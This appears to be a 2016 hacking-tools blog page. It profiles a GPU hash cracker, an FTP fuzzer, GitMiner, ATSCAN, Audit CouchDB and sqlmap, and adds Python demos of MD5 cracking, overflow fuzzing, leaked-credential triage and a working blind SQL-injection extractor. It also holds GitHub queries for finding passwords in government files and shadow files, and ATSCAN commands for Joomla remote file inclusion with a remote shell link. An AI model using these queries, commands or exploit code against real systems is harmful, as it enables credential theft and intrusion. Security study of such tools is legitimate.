Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is an Ubuntu-based Linux distribution oriented towards penetration testing and security assessment, providing a network and information-systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution built on Debian Squeeze. For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...

Saturday, March 5, 2016

Large Scale Brute Force Cryptanalysis - Wisecracker




Large scale brute force cryptanalysis needs a tremendous amount of computational power that government agencies like the NSA and companies like Google have.

An average security researcher might want to have such capabilities as well but they do not have the tools or the computational resources. Moreover, they might not be skilled in writing software that takes advantage of the computational resources provided by commercial-off-the-shelf systems with CUDA and OpenCL capable GPUs and computational clusters provided by Amazon EC2 and Microsoft Azure.

With Wisecracker we bridge this gap by providing an open source framework for security researchers to write their own cryptanalysis tools that distribute brute force cryptanalysis work across multiple systems, each with multiple multi-core processors and GPUs. Security researchers can also use the sample tools shipped with Wisecracker out of the box. The differentiating aspect of Wisecracker is that it uses OpenCL and MPI together to distribute the work across multiple systems, each having multiple CPUs and/or GPUs. We support the OpenCL libraries provided by Intel, AMD and NVIDIA, and multiple operating systems such as Linux, Microsoft Windows and Apple's Mac OS X.

Wisecracker documentation: Large Scale Brute Force Cryptanalysis

Wisecracker is licensed under the GNU General Public License version 3 and is free for anyone to use. The source code and the latest downloadable version of Wisecracker can be obtained from GitHub.

Technical Details

Wisecracker comes with a C and C++ API for the user to write their own custom cryptanalysis software using a combination of OpenCL, C and/or C++.

Wisecracker uses a divide-and-conquer algorithm to split the work into tasks across multiple systems; each system then hands its tasks out round-robin to the OpenCL devices it has.

An example application such as the MD5 password cracker is provided as a demonstration on how to use Wisecracker and also as a ready-to-use application for cracking passwords of up to 8 characters.

A user can download Wisecracker on a GPU cluster virtual machine provided by Amazon EC2 and reverse an MD5 cryptographic hash for a 6 character password in about 20 minutes if using 1 virtual machine or in about 3 minutes if using 2.
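The two scheduling steps described above (divide the keyspace across systems, then deal each system's share round-robin to its devices) and the MD5 cracker can be seen together in this added Python example. It is not Wisecracker's own code: Wisecracker runs the per-device work as OpenCL kernels driven over MPI, whereas here every (node, device) slice is worked sequentially in one process so that it runs offline. The cluster layout, charset, chunk size and the 3-character target are assumptions made for the demonstration.

```python
"""Added example, not Wisecracker's own code: split a brute-force keyspace
across a hypothetical cluster the way the text describes, then crack an
MD5 hash inside the slices.  Cluster layout, charset and chunk size are
assumptions made for the demonstration."""
import hashlib
from typing import Dict, List, Optional, Tuple

# Hypothetical layout: node name -> number of OpenCL devices on that node.
CLUSTER: Dict[str, int] = {"node-a": 2, "node-b": 1}
CHARSET = "abcdefghijklmnopqrstuvwxyz"   # lowercase only, to keep the demo fast

Range = Tuple[int, int]   # half-open [lo, hi) slice of the keyspace


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def unrank(index: int, charset: str, length: int) -> str:
    """Map a keyspace index to its candidate string (mixed-radix decode, base len(charset))."""
    base, chars = len(charset), []
    for _ in range(length):
        index, digit = divmod(index, base)
        chars.append(charset[digit])
    return "".join(reversed(chars))


def partition(total: int, parts: int) -> List[Range]:
    """Divide and conquer: cut [0, total) into `parts` contiguous near-equal ranges."""
    step, rem = divmod(total, parts)
    ranges, start = [], 0
    for i in range(parts):
        end = start + step + (1 if i < rem else 0)
        ranges.append((start, end))
        start = end
    return ranges


def plan_work(total: int, cluster: Dict[str, int], chunk: int) -> Dict[str, List[List[Range]]]:
    """Each node gets one contiguous slice; inside the node, fixed-size chunks of
    that slice are dealt round-robin to its devices."""
    plan: Dict[str, List[List[Range]]] = {}
    for node, (lo, hi) in zip(cluster, partition(total, len(cluster))):
        devices: List[List[Range]] = [[] for _ in range(cluster[node])]
        for k, start in enumerate(range(lo, hi, chunk)):
            devices[k % cluster[node]].append((start, min(start + chunk, hi)))
        plan[node] = devices
    return plan


def plan_coverage(plan: Dict[str, List[List[Range]]]) -> int:
    """Number of candidates a plan covers; must equal the keyspace size (no gaps)."""
    return sum(hi - lo for devices in plan.values() for ranges in devices for lo, hi in ranges)


def crack_range(target: str, rng: Range, charset: str, length: int) -> Optional[str]:
    """What one device does with one chunk: hash every candidate in its range."""
    for idx in range(*rng):
        cand = unrank(idx, charset, length)
        if md5_hex(cand) == target:
            return cand
    return None


def crack(target: str, charset: str, length: int, cluster: Dict[str, int],
          chunk: int = 5000) -> Optional[Tuple[str, str, int]]:
    """Walk the whole plan here in one process; on a real cluster each (node, device)
    works its chunks in parallel.  Returns (password, node, device index)."""
    plan = plan_work(len(charset) ** length, cluster, chunk)
    for node, devices in plan.items():
        for dev, ranges in enumerate(devices):
            for rng in ranges:
                found = crack_range(target, rng, charset, length)
                if found is not None:
                    return found, node, dev
    return None


if __name__ == "__main__":
    target = md5_hex("hat")   # constructed target: a 3-character password
    print(crack(target, CHARSET, 3, CLUSTER))
```

The index-to-candidate mapping is what makes the split cheap: a node only needs its (lo, hi) pair, not a list of candidates, and `plan_coverage` is the check that the ranges tile the keyspace without gaps or overlap before anything is dispatched.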

More applications for cracking cryptographic hashes such as SHA-1, SHA-256 and others will be added in the near future.



Monday, February 29, 2016

Search engine that allows computer scientists - Censys





Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet. Driven by Internet-wide scanning, Censys lets researchers find specific hosts and create aggregate reports on how devices, websites, and certificates are configured and deployed. [more information]





Simple FTP Fuzzer - SFTPfuzzer



SFTPfuzzer (Simple FTP Fuzzer) is a very simple tool written in Python 2.7 (by 0x8b30cc) that lets you fuzz the username and password fields of an FTP server, looking for buffer overflow vulnerabilities.

SFTPfuzzer is written in a very simple way, and the code is well commented, allowing you to easily understand what is going on and easily edit the software. The code is licensed under GNU General Public License (GPL v3), if you want to know more read here.

Usage:

You can use SFTPfuzzer.py in two ways, manual mode and arguments mode.

If you want to enter the target IP address (RHOST) and target port (RPORT) interactively, just run:

$ python SFTPfuzzer.py

If you want to add command line arguments, then the usage will be like this:

$ python SFTPfuzzer.py -t <rhost> -p <rport>

For example:

$ python SFTPfuzzer.py -t 192.168.1.8 -p 21
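What such a fuzzer actually does on the wire is shown in this added Python 3 example. It is not SFTPfuzzer's code: it ramps the length of the USER argument and reports the first length at which the server stops answering sanely. So that it runs offline it talks to a constructed stand-in server (in the same file) that drops the connection once the argument reaches CRASH_AT bytes, which is the symptom a daemon dying on an overflow shows; the threshold, loopback host and step sizes are assumptions for the demo. Against a real target you would point `fuzz_user_field` at its RHOST/RPORT and watch the service with a debugger to confirm the crash.

```python
"""Added example, not SFTPfuzzer's own code: a length-ramping fuzzer for the FTP
USER command, run offline against a constructed stand-in server that stops
replying once the USER argument is CRASH_AT bytes or longer."""
import socket
import threading
from typing import Callable, Optional, Tuple

CRASH_AT = 300   # constructed: the stand-in "crashes" on USER arguments this long or longer


def fake_ftp_server(listener: socket.socket, crash_at: int) -> None:
    """Minimal FTP-like responder: banner, one USER command, then hang up.
    An oversized USER closes the connection without a reply, like a dead daemon."""
    while True:
        try:
            conn, _ = listener.accept()
        except OSError:
            return                      # listener closed: stop serving
        with conn:
            conn.sendall(b"220 stand-in FTP ready\r\n")
            reader = conn.makefile("rb")
            line = reader.readline().rstrip(b"\r\n")
            reader.close()
            if line.upper().startswith(b"USER ") and len(line) - 5 >= crash_at:
                continue                # simulated crash: connection dropped silently
            conn.sendall(b"331 Password required\r\n")


def start_fake_server(crash_at: int = CRASH_AT) -> Tuple[socket.socket, int]:
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))     # OS-assigned free port
    listener.listen(5)
    threading.Thread(target=fake_ftp_server, args=(listener, crash_at), daemon=True).start()
    return listener, listener.getsockname()[1]


def probe_user(host: str, port: int, length: int, timeout: float = 3.0) -> bool:
    """Send USER with `length` filler bytes; True only if the server replied sanely."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if not s.recv(1024).startswith(b"220"):
                return False
            s.sendall(b"USER " + b"A" * length + b"\r\n")
            reply = s.recv(1024)        # b"" here means the peer closed on us
    except (OSError, socket.timeout):
        return False                    # refused, reset or timed out: treat as a crash
    return reply.startswith(b"331") or reply.startswith(b"230")


def fuzz_user_field(host: str, port: int, start: int = 100, step: int = 100,
                    limit: int = 3000,
                    probe: Optional[Callable[[str, int, int], bool]] = None) -> Optional[int]:
    """Ramp the USER argument length; return the first length that got no sane reply,
    or None if the server survived every length up to `limit`."""
    probe = probe or probe_user
    for length in range(start, limit + 1, step):
        if not probe(host, port, length):
            return length
    return None


if __name__ == "__main__":
    listener, port = start_fake_server()
    print("first failing USER length:", fuzz_user_field("127.0.0.1", port))
    listener.close()
```

The probe treats "no 331/230 reply" (EOF, reset, refused, or a timeout) as a failure rather than trusting any one error type, because a crashed service shows up differently depending on whether the process died, was restarted by a supervisor, or merely hung.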



Collaborative Penetration Test and Vulnerability Management Platform - Faraday 1.0.17



Faraday introduces a new concept, the IPE (Integrated Penetration-Test Environment): a multiuser penetration-test IDE designed for the distribution, indexing and analysis of the data generated during a security audit.


The first of many releases in 2016, Faraday v.1.0.17 (Community, Pro & Corp) introduces a new Maltego Plugin, support for Mint 17 and Kali Rolling, and several fixes including installation issues.






Changes:

ºNew Maltego Plugin
ºAdded support for Kali Rolling Edition
ºAdded support for Mint 17
ºAdded user notification when the current Workspace doesn't exist
ºAdded removeBySeverity.py script - as its name describes, it removes all vulns with a specific severity value. It supports the following parameters:

-v extended output
-t dry-run, won't connect to DB
-s severity to filter by, required
-d workspace, required





python $FARADAY/helpers/removeBySeverity.py -d WORKSPACE_NAME -s SEVERITY -v 


Bug fixes:

ºFixed pip bug on Debian
ºFixed pip install bug
ºAdded additional dependency checks during installation
ºAdded a warning about upgrading to experimental during Debian installation
ºFixed small bug in CSV importing
ºFixed styles for Status Report
ºFixed bug in Status Report filter after editing
ºShow all evidence files in Status Report
ºFixed Arachni plugin bugs


We hope you enjoy it, and let us know if you have any questions or comments.

https://www.faradaysec.com/

https://twitter.com/faradaysec



Sunday, February 28, 2016

Automatic search for GitHub - GitMiner







 + Author: Danilo Vaz a.k.a. UNK
 + Blog: http://unk-br.blogspot.com
 + Github: http://github.com/danilovazb
 + Twitter: https://twitter.com/danilovaz_unk

DESCRIPTION

Advanced search and automation tool for GitHub.
This tool aims to make it easy to search for code or code
snippets on GitHub through the site's search page.

MOTIVATION

Demonstrates how fragile it is to trust public repositories with code that contains sensitive information.

REQUIREMENTS

argparse
requests
json
lxml

INSTALL

git clone http://github.com/danilovazb/GitMiner

sudo apt-get install python-requests python-lxml 

OR

pip install lxml requests

HELP

Automatic search for GitHub.
 + Author: Danilo Vaz a.k.a. UNK
 + Blog: http://unk-br.blogspot.com
 + Github: http://github.com/danilovazb
 + Gr33tz: l33t0s, RTFM


[-h] [-q 'filename:shadown path:etc']
       [-m wordpress] [-o result.txt]

optional arguments:
  -h, --help            show this help message and exit
  -q 'filename:shadown path:etc', --query 'filename:shadown path:etc'
                        Specify search term
  -m wordpress, --module wordpress
                        Specify the search module
  -o result.txt, --output result.txt
                        Specify the output file where it will be saved

EXAMPLE

Searching for wordpress configuration files with passwords:


$:> python git_miner.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -o result.txt





Looking for Brazilian government files containing passwords:

$:> python git_miner.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas

Looking for shadow files under the etc path:

$:> python git_miner.py --query 'filename:shadow path:etc' -m root

Searching for joomla configuration files with passwords:


$:> python git_miner.py --query 'filename:configuration extension:php "public password" in:file' -m joomla
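Queries like the ones above return candidate files, and the next step is deciding which of them really expose something. This added Python example (not GitMiner's code, which only drives the GitHub search page) does that triage offline: it scans file contents for the credential definitions the three query families target (WordPress `define()` constants, Joomla `configuration.php` properties, and `/etc/shadow` entries with a real hash) and drops obvious template values. All sample file contents, names and values are constructed for the example, not taken from any repository.

```python
"""Added example, not GitMiner's own code: offline triage of files that a
search like the ones above might return, flagging credential definitions and
skipping template placeholders.  Sample contents are constructed."""
import re
from typing import Dict, List, Tuple

# Constructed samples of the three file types the queries above look for.
SAMPLES: Dict[str, str] = {
    "wp-config.php": (
        "<?php\n"
        "define('DB_NAME', 'shop');\n"
        "define('DB_USER', 'shopuser');\n"
        "define('DB_PASSWORD', 'Winter2016!');\n"
        "define('FTP_HOST', 'ftp.example.com');\n"
        "define('FTP_PASS', 'hunter2');\n"
        "define('AUTH_KEY', 'put your unique phrase here');\n"
    ),
    "configuration.php": (
        "<?php\nclass JConfig {\n"
        "    public $user = 'joomla';\n"
        "    public $password = 'jpass123';\n"
        "    public $secret = 'x7Qe9L';\n"
        "}\n"
    ),
    "shadow": (
        "root:$6$saltsalt$hashhashhash:16000:0:99999:7:::\n"
        "www-data:*:16000:0:99999:7:::\n"
    ),
}

Hit = Tuple[str, str, str]   # (kind, name, value)

PATTERNS = [
    # WordPress-style define('NAME', 'value') where NAME looks credential-like
    ("php-define", re.compile(
        r"define\(\s*'([A-Z_]*(?:PASS|PASSWORD|SECRET|KEY)[A-Z_]*)'\s*,\s*'([^']*)'")),
    # Joomla configuration.php properties
    ("php-property", re.compile(r"public\s+\$(password|secret)\s*=\s*'([^']*)'")),
    # /etc/shadow entries that carry a real hash (not '*' or '!')
    ("shadow-hash", re.compile(r"^([^:\n]+):(\$[0-9a-z]+\$[^:\n]+):", re.M)),
]
# Default/template values that are not real secrets
PLACEHOLDERS = {"", "put your unique phrase here", "password_here", "changeme"}


def find_secrets(text: str) -> List[Hit]:
    """Every credential-looking definition in `text`, minus known placeholders."""
    hits: List[Hit] = []
    for kind, pat in PATTERNS:
        for m in pat.finditer(text):
            name, value = m.group(1), m.group(2)
            if value.strip().lower() in PLACEHOLDERS:
                continue
            hits.append((kind, name, value))
    return hits


def triage(files: Dict[str, str]) -> Dict[str, List[Hit]]:
    """Per file, the lines worth a human look; files with nothing are dropped."""
    return {name: hits for name, text in files.items() if (hits := find_secrets(text))}


if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        for kind, key, value in hits:
            print(f"{name}: [{kind}] {key} = {value!r}")
```

The placeholder filter matters more than it looks: the stock WordPress `wp-config-sample.php` ships credential-shaped constants with dummy values, so a search that matches on `DB_PASSWORD` alone is mostly noise until those are dropped.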








Android Pentesting Portable Integrated Environment - Appie v3



Appie is a software package that has been pre-configured to function as an Android pentesting environment on any Windows-based machine without the need for a virtual machine (VM) or dual boot.

It is completely portable and can be carried on a USB stick or your smartphone. It is a one-of-a-kind Android security analysis tool and a one-stop answer for all the tools needed in Android application security assessment, Android forensics and Android malware analysis.


Difference between Appie and existing environments?

  • Tools contained in Appie run on the host machine instead of in a virtual machine.
  • Less space needed (only around 1.5 GB, compared to at least 10 GB for a virtual machine).
  • As the name suggests it is completely portable, i.e. it can be carried on a USB stick or your smartphone, and your pentesting environment goes wherever you go without any configuration changes.
  • Awesome interface.

Below are some of the changes made since the previous version:
  • It now ships Python 2.7.11 (32-bit) so that even 32-bit systems have no problem using it.
  • Also updated the ConEmu framework which I use as the base terminal.
  • Although all the tools are updated in Appie, this version introduces a simple update script through which you can update all the tools inside Appie without downloading a new version of Appie, which saves a lot of time.
  • It is a lot faster now; if you are an existing user of Appie you will notice that.
  • Some new tools have been included in this version:


Demo Video

Below is a short demonstration video of Appie.




More: https://manifestsecurity.com/appie-version-3-released/




Search Site Server Scanner - ATSCAN v6.2




Description:


  • Search engine
  • XSS scanner
  • Sqlmap
  • LFI scanner
  • Filter WordPress and Joomla sites on the server
  • Find admin page
  • Generate MD5, encode / decode Base64
  • Port scan
  • Scan e-mails in sites
  • Use proxy
  • Random user agent
  • Random search engine
  • Scan errors
  • Detect CMS
  • Multiple instant scan
  • Available on the BlackArch Linux platform

Libraries to install:

apt-get install libxml-simple-perl
apt-get install libio-socket-ssl-perl
apt-get install libcrypt-ssleay-perl

NOTE: Works on Linux platforms. Best run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux or CentOS. If you use Windows you can download the libraries manually.

Download & Execution:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x ATSCAN
OR
chmod +x atscan.pl
Execute: perl ./atscan.pl
Help: perl ./atscan.pl --help
Update: perl ./atscan.pl --update

Help:

--proxy
Set tor proxy [Ex: socks://localhost:9050]
--dork
dork to search [Ex: house,cars,hotel]
--level
Scan level (+- Number of page results to scan)
--xss
Xss scan
--joomrfi
joomla local file inclusion scan
-t
Target
--TARGET
Captured Target
--FULL_TARGET
Captured Full Target
--exp
Set exploit
--valid
Text to validate results
--sqlmap
Run sqlmap on the scan results
--lfi
local file inclusion
--joomrfi
get joomla sites with rfi
--shell
shell link [Ex: http://www.site.com/shell.txt ]
--wpadf
get wordpress sites with arbitrary file download
--admin
get site admin page
--shost
get site subdomains
--ports
scan server ports
--start
start scan port
--end
end scan port
--all
complete mode
--basic
basic mode
--select
Select mode: you can set a range of ports
--sites
sites in the server
--wp
get wordpress sites
--joom
Get joomla sites
--upload
get sites with upload files
--zip
get sites with zip files
--save
file prefix to save results (if not set tool sets one)
--md5
convert to md5
--encode64
encode base64 string
--decode64
decode base64 string
--isup
check http status 200
--email
Extract e-mails
--command
External Command
--replace
string to replace
--with
string to replace with
--save
Set prefix to saved files
--rang
Set IP range
--nobanner
Hide tool banner
--beep
Produce a beep sound if a positive scan result is found

Examples:

Simple search:

Search: --dork [dork] --level [level]
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]
Search + Extract e-mails: --dork [dorks.txt] --level [level] --email

Subscan from Search Engine:

Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + xss + sqlmap: --dork [dork] --level [10] --xss --sqlmap
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: --rang 133.21.10.155-19.102.25.14 --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:

Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:

-t [target/targets.txt] --exp --isup/--valid [string]
-t [target/targets.txt] --xss/--lfi ..

Server:

Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitrary File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomrfi --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp basic (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan range tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan range udp: -t [ip] --ports --select udp --start [value] --end [value]
Scan range udp + tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:

Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:

--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Multiple Scan:

--dork [dork] --level [10] --xss/--lfi/--wp ...
--dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss --lfi --wp ...
-t [ip] --level [10] --xss --lfi --wp ...
-t [targets] --xss --lfi --wp ...




The Simple, Clear, CouchDB Security Assessment - Audit CouchDB




Audit CouchDB is a simple tool with a powerful message. Given an Apache CouchDB URL, it will tell you everything you ever wanted to know about its security.

Objective

Audit CouchDB will perform the following actions:
  1. Learn every possible fact about the couch, for example:
    • What is the server configuration?
    • What user accounts exist?
    • What user roles exist?
    • What databases exist?
    • In each database, what is the security setting?
    • In each design document, what are the validation functions?
  2. Given the facts, compare them against each other and warn if they imply a security concern, for example:
    • You obviously didn't bother to click the "Security" link in the database page in Futon
    • Published CVE alerts apply to your version of CouchDB
    • A design document is missing a validate_doc_update function
    • Helpful summaries of how many admins, normal users, and anonymous users can access each database
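Step 2, comparing the facts against each other, is the part worth seeing in code. The added Python example below is not audit_couchdb's own code (which is a Node application): it takes a constructed snapshot shaped like what an admin can read from a CouchDB 1.x server (`/_config`, each database's `/_security` object and its design documents), derives the per-database summary, and emits the warnings listed above that the facts support. It does not attempt the CVE check, since that needs a vulnerability feed the example does not carry. The snapshot, database names and the validation function are made up for the demonstration.

```python
"""Added example, not audit_couchdb's own code: the 'compare the facts' step
over a constructed snapshot of a CouchDB 1.x server's configuration, per-database
security objects and design documents."""
from typing import Any, Dict, List

SNAPSHOT: Dict[str, Any] = {   # constructed for the example
    "version": "1.6.1",
    "config": {
        "admins": {"admin": "<hashed password>"},
        "couch_httpd_auth": {"require_valid_user": "false"},
    },
    "databases": {
        "inventory": {
            "security": {"admins": {"names": [], "roles": []},
                         "members": {"names": [], "roles": []}},
            "design_docs": {
                "_design/items": {"views": {"all": {"map": "function(doc){ emit(doc._id); }"}}},
            },
        },
        "payroll": {
            "security": {"admins": {"names": ["hr_admin"], "roles": []},
                         "members": {"names": [], "roles": ["hr"]}},
            "design_docs": {
                "_design/records": {"validate_doc_update":
                    "function(newDoc, oldDoc, userCtx){ "
                    "if (userCtx.roles.indexOf('hr') < 0) throw({forbidden: 'hr only'}); }"},
            },
        },
    },
}


def _empty(section: Dict[str, List[str]]) -> bool:
    return not section.get("names") and not section.get("roles")


def anonymous_allowed(config: Dict[str, Any]) -> bool:
    """CouchDB accepts unauthenticated requests unless require_valid_user is on."""
    return config.get("couch_httpd_auth", {}).get("require_valid_user") != "true"


def summarize(snapshot: Dict[str, Any]) -> Dict[str, Dict[str, Any]]:
    """Per database: how many admins/members are named, and whether anonymous
    users get member access.  CouchDB grants everyone member access when the
    members section of the security object is empty."""
    anon = anonymous_allowed(snapshot["config"])
    out: Dict[str, Dict[str, Any]] = {}
    for name, db in snapshot["databases"].items():
        sec = db.get("security", {})
        admins, members = sec.get("admins", {}), sec.get("members", {})
        out[name] = {
            "admins": len(admins.get("names", [])) + len(admins.get("roles", [])),
            "members": len(members.get("names", [])) + len(members.get("roles", [])),
            "open_to_everyone": _empty(members),
            "anonymous": _empty(members) and anon,
        }
    return out


def audit(snapshot: Dict[str, Any]) -> List[str]:
    """Warnings implied by the facts; an empty list means nothing to report."""
    warnings: List[str] = []
    cfg = snapshot["config"]
    if not cfg.get("admins"):
        warnings.append("server: no admins configured ('admin party'); everyone is a server admin")
    if anonymous_allowed(cfg):
        warnings.append("server: require_valid_user is off; unauthenticated requests are accepted")
    for name, facts in summarize(snapshot).items():
        if facts["open_to_everyone"]:
            who = "anonymous users" if facts["anonymous"] else "every authenticated user"
            warnings.append(f"{name}: empty members section, {who} can read and write documents")
        for ddoc, body in snapshot["databases"][name].get("design_docs", {}).items():
            if "validate_doc_update" not in body:
                warnings.append(f"{name}/{ddoc}: no validate_doc_update function, writes are not validated")
    return warnings


if __name__ == "__main__":
    for w in audit(SNAPSHOT):
        print("WARN", w)
```

The interesting warning is the conjunction: an empty members section is only "open to the world" when `require_valid_user` is also off, which is why the server-level fact is threaded into the per-database summary rather than reported in isolation.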

Usage

Currently, Audit CouchDB is a Node application distributed via NPM. Install it (globally) via npm.

npm install -g audit_couchdb

Next, run the tool with your CouchDB URL as a parameter. You should connect as an admin user, so Audit CouchDB can fetch all possible information (such as the configuration).

audit_couchdb https://admin:secret@localhost:5984

The tool will output everything it knows about your couch's security.
To see how audit_couchdb is working, set its log level to debug. It will show you each query it makes as it learns facts about your couch.

audit_couchdb --level=debug https://admin:secret@localhost:5984

Running from the Browser

Audit CouchDB is implemented as a library, depending on a back-end request library and a front-end to display the output (simple console text output, or log4j if it is installed).
I recently re-implemented request in the browser as jQuery Request. Thus I am excited to see Audit CouchDB run in the browser, however I have not begun this work.



Automatic SQL Injection And Database Takeover Tool - SQLMap



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Refer to the wiki for an exhaustive breakdown of the features.
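Of the six techniques listed, boolean-based blind is the one whose mechanics are least obvious from the name, so here is an added Python example (not sqlmap's code) that shows it end to end: a deliberately injectable lookup over an in-memory SQLite table, its parameterised fix beside it, and an extractor that recovers a secret through nothing but the true/false answer of that lookup, seven bits per character. sqlmap does the same with far more care (detection, DBMS-specific syntax, error handling, wider character sets); the table names, rows and the secret here are constructed for the demonstration.

```python
"""Added example, not sqlmap's code: a vulnerable lookup, its hardened form,
and a boolean-based blind extraction that uses only the lookup's yes/no answer.
Table contents and the secret are constructed for the demo."""
import sqlite3
from typing import Callable

ASCII_BITS = 7   # enough for ASCII secrets; a real tool would handle wider charsets


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE items(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO items VALUES (1, 'widget');
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret');   -- constructed sample data
    """)
    return con


def vulnerable_item_exists(con: sqlite3.Connection, item_id: str) -> bool:
    """VULNERABLE: user input is concatenated into the statement.  The caller only
    learns whether a row came back, and that one bit is the oracle."""
    return con.execute("SELECT title FROM items WHERE id = " + item_id).fetchone() is not None


def safe_item_exists(con: sqlite3.Connection, item_id: str) -> bool:
    """Hardened form: a bound parameter, so input cannot change the statement."""
    try:
        value = int(item_id)
    except ValueError:
        return False
    return con.execute("SELECT title FROM items WHERE id = ?", (value,)).fetchone() is not None


def blind_extract(oracle: Callable[[str], bool], expr: str) -> str:
    """Boolean-based blind: ask 'is bit b set?' of the length, then of each
    character code, of the scalar subquery `expr`.  Row id 1 exists, so the
    oracle's answer is exactly the truth of the appended condition."""
    def bit_set(sql_int: str, bit: int) -> bool:
        return oracle(f"1 AND (({sql_int}) & {1 << bit}) != 0")

    length = 0
    for bit in range(ASCII_BITS - 1, -1, -1):                 # lengths up to 127
        if bit_set(f"length(({expr}))", bit):
            length |= 1 << bit
    out = []
    for pos in range(1, length + 1):
        code = 0
        for bit in range(ASCII_BITS - 1, -1, -1):
            if bit_set(f"unicode(substr(({expr}), {pos}, 1))", bit):
                code |= 1 << bit
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    con = build_db()
    secret = blind_extract(lambda p: vulnerable_item_exists(con, p),
                           "SELECT pass FROM users WHERE name = 'alice'")
    print("recovered:", secret)
```

The cost is the point: recovering a 6-character value takes 7 length queries plus 6 x 7 character queries, 49 requests in total, which is why blind techniques are slower than UNION or error-based extraction and why sqlmap prefers those when the application leaks query output directly.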



Tuesday, February 23, 2016

Most Secure Peer-to-Peer Encrypted Messenger that Sends No Metadata - Ricochet




There are several encrypted messaging apps for mobile and desktop platforms that ship with a "The Most Secure" tagline but end up de-anonymizing the real identity of their users in one way or another.

In fact, very few encrypted messaging apps available today deal with the core problem of metadata.

The majority of apps offer end-to-end encryption that keeps the content of your messages away from prying eyes, but your metadata is still accessible to them, which is enough to know who you really are and who you're talking to.

